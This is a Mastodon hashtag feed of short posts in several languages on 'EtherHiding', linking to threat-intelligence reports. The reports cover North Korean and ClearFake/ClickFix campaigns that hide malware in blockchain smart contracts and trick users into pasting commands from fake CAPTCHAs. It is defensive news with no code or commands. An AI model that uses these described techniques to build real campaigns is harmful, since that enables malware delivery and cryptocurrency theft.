Mastodawn

Botnet Trojan delivered through ClickFix and EtherHiding

Pulse ID: 69a757a872a0ab148da31e83
Pulse Link: https://otx.alienvault.com/pulse/69a757a872a0ab148da31e83
Pulse Author: Tr1sa111
Created: 2026-03-03 21:50:32

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #EtherHiding #InfoSec #OTX #OpenThreatExchange #Trojan #bot #botnet #Tr1sa111

LevelBlue - Open Threat Exchange

Learn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.

LevelBlue Open Threat Exchange

Rod2ik 🇪🇺 🇨🇵 🇪🇸 🇺🇦 🇨🇦 🇩🇰 🇬🇱 ☮🕊️Mar 1

Une méthode inédite, baptisée « #EtherHiding », transforme la #blockchain de #cryptomonnaies #Ethereum en arsenal offensif. Les #chercheurs en #cybersécurité de #Google tirent la sonnette d' #alarme face à cette escalade #technologique www.futura-sciences.com/tech/actuali...

La blockchain n’est plus sûre ...

La blockchain n’est plus sûre : ce piratage venu de Corée du Nord inquiète

Des cybercriminels au service de la Corée du Nord ont développé une technique sophistiquée pour dissimuler leurs programmes malveillants : ils exploitent désormais la blockchain Ethereum comme refuge numérique. Cette méthode inédite, baptisée « EtherHiding », transforme l'infrastructure décentralisée des cryptomonnaies en arsenal offensif. Les chercheurs en cybersécurité tirent la sonnette d'alarme face à cette escalade technologique.

Futura

Rod2ik 🇪🇺 🇨🇵 🇪🇸 🇺🇦 🇨🇦 🇩🇰 🇬🇱☮🕊️Mar 1

https://www.futura-sciences.com/tech/actualites/cybersecurite-blockchain-nest-plus-sure-ce-piratage-venu-coree-nord-inquiete-k2m6-131599/

La blockchain n’est plus sûre : ce piratage venu de Corée du Nord inquiète

Futura

OTX Bot Feb 27

Botnet Trojan delivered through ClickFix and EtherHiding

A sophisticated phishing campaign impersonating Tesseract OCR was discovered, utilizing typosquatting and ClickFix techniques. The attack chain, named OCRFix, employed multi-stage malware deployments with heavy obfuscation and defense evasion techniques, including EtherHiding. The campaign used BNB Smart Chain TestNet to hide C2 domains through smart contracts. The malware delivery process involved three stages: a loader, a secondary loader for persistence, and a bot listener. The final payload connected to a bot control panel, allowing attackers to manage infected hosts and deploy additional malware. The campaign demonstrated a combination of simple initial access methods with complex delivery chains, highlighting the ongoing effectiveness of techniques like ClickFix and the importance of robust phishing defenses.

Pulse ID: 69a163c992e9afc70efc55d7
Pulse Link: https://otx.alienvault.com/pulse/69a163c992e9afc70efc55d7
Pulse Author: AlienVault
Created: 2026-02-27 09:28:41

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #EtherHiding #InfoSec #Malware #OTX #OpenThreatExchange #Phishing #RAT #Trojan #TypoSquatting #bot #botnet #AlienVault

LevelBlue - Open Threat Exchange

Learn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.

LevelBlue Open Threat Exchange

CyberVeille.ch Jan 23

📢 Expel décrit une évolution de ClearFake/ClickFix qui héberge ses charges via des smart contracts
📝 Source et contexte: Expel (blog, Marcus Hutchins, 20 janv.
📖 cyberveille : https://cyberveille.ch/posts/2026-01-22-expel-decrit-une-evolution-de-clearfake-clickfix-qui-heberge-ses-charges-via-des-smart-contracts/
🌐 source : https://expel.com/blog/clearfake-new-lotl-techniques/
#ClearFake #EtherHiding #Cyberveille

Expel décrit une évolution de ClearFake/ClickFix qui héberge ses charges via des smart contracts

Source et contexte: Expel (blog, Marcus Hutchins, 20 janv. 2026) publie une analyse technique de la campagne malware ClearFake/ClickFix, active sur des centaines de sites compromis et axée sur l’évasion défensive. • Ce que fait ClearFake: framework JavaScript malveillant injecté sur des sites piratés, affichant un faux CAPTCHA “ClickFix” qui incite l’utilisateur à faire Win+R puis à coller/valider une commande, déclenchant l’infection. La chaîne JS est obfusquée et prépare des charges ultérieures.

CyberVeille

goneo Oct 21

#wordpress : Es gibt einen neuen Hacking Trick, um einen Malware-Launcher einzuschleusen: EtherHiding. Dabei nutzen die Angreifer smart contracts, die auf einer Block Chain liegen - und damit ist der Schadcode nicht löschbar. Wie das genau funktioniert:
https://www.goneo.de/blog/2025/10/20/%f0%9f%9a%a8-achtung-deine-wordpress-seite-als-malware-launcher-dank-etherhiding/ #hacking #etherhiding

BGDon 🇨🇦 🇺🇸 👨‍💻Oct 20

EtherHiding emerges as a malware delivery mechanism!

Google threat intelligence is reporting North Korean nation-state actor "UNC5342" is leveraging transactions on public blockchains to store and retrieve malicious payloads.

EtherHiding executes a social engineering campaign (fake job interviews, crypto games) as the initial compromise to lure developers — often those working in the cryptocurrency or tech industries — into downloading malware disguised as job-related files or coding challenges.

Once a target opens the file, a malicious script connects to a public blockchain like BNB Smart Chain or Ethereum, to retrieve encrypted code from a smart contract. That code installs a JadeSnow loader, which in turn delivers a more persistent backdoor known as InvisibleFerret that has been used in multiple cryptocurrency thefts.

https://cloud.google.com/blog/topics/threat-intelligence/dprk-adopts-etherhiding #Security #CyberSecurity #Hackers #CyberAttack #UNC5342 #Google #Malware #SmartContracts #Crypto #CryptoCurrency #EtherHiding #SocialEngineering #BlockChain

Ivan Oct 20

North Korean state-sponsored hackers are embedding malware within public blockchains to steal cryptocurrency, a technique called "EtherHiding." Malicious JavaScript payloads are hidden inside smart contracts, making them effectively unremovable.
Read more: https://www.tomshardware.com/tech-industry/cyber-security/north-korea-hiding-malware-inside-blockchain-smart-contracts
#Cybersecurity #Malware #NorthKorea #Hacking #Blockchain #Crypto #Cryptocurrency #EtherHiding #SmartContracts #CyberAttack #TechNews

North Korean state-sponsored hackers slip unremovable malware inside blockchains to steal cryptocurrency — EtherHiding embeds malicious JavaScript payloads in smart contracts on public blockchains

Google reports DPRK group UNC5342 uses EtherHiding to deliver backdoors and steal crypto, marking the first nation-state use of a tactic designed for resistant attacks.

Tom's Hardware

eicker.news ᳇ tech news Oct 18

#NorthKorea|n #hackers, tracked as #UNC5342, are using the #EtherHiding technique to hide #malware on the #blockchain. This technique, first described by Guardio Labs, allows the threat actor to host #maliciousscripts within #smartcontracts on the Binance Smart Chain or Ethereum, making it difficult to track and disrupt campaigns. https://www.bleepingcomputer.com/news/security/north-korean-hackers-use-etherhiding-to-hide-malware-on-the-blockchain/?eicker.news #tech #media #news

North Korean hackers use EtherHiding to hide malware on the blockchain

North Korean hackers were observed employing the 'EtherHiding' tactic to deliver malware, steal cryptocurrency, and perform espionage with stealth and resilience.

BleepingComputer

The DefendOps Diaries Oct 16

North Korean hackers are taking stealth to a new level: embedding malware into blockchain smart contracts and tricking devs with fake job interviews. Are we ready for a world where your next code review could be a trap?

https://thedefendopsdiaries.com/north-korean-hackers-leverage-etherhiding-malware-distribution-via-blockchain-smart-contracts/

#etherhiding
#northkoreanhackers
#blockchainsecurity
#malwaredistribution
#smartcontracts
#cyberthreats
#socialengineering
#infosec